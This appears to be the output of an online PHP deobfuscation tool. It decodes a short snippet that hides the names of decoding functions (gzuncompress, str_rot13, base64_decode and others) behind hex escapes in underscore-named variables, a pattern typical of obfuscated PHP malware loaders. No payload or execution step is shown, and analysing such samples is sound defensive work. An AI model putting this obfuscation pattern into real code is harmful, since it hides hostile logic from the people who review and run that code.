Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?= $_ = "\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73"; $__ = "\x73\x74\x72\x5F\x72..
Decoded Output download
<?=
$_ = "gzuncompress";
$__ = "str_rot13";
$___ = "rawurldecode";
$____ = "convert_uudecode";
$_____ = "gzinflate";
$______ = "base64_decode";
Did this file decode correctly?
Original Code
<?=
$_ = "\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73";
$__ = "\x73\x74\x72\x5F\x72\x6F\x74\x31\x33";
$___ = "\x72\x61\x77\x75\x72\x6C\x64\x65\x63\x6F\x64\x65";
$____ = "\x63\x6F\x6E\x76\x65\x72\x74\x5F\x75\x75\x64\x65\x63\x6F\x64\x65";
$_____ = "\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65";
$______ = "\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65";
Function Calls
None |
Stats
MD5 | 3499e21de34067d85231986c1b59efd8 |
Eval Count | 0 |
Decode Time | 76 ms |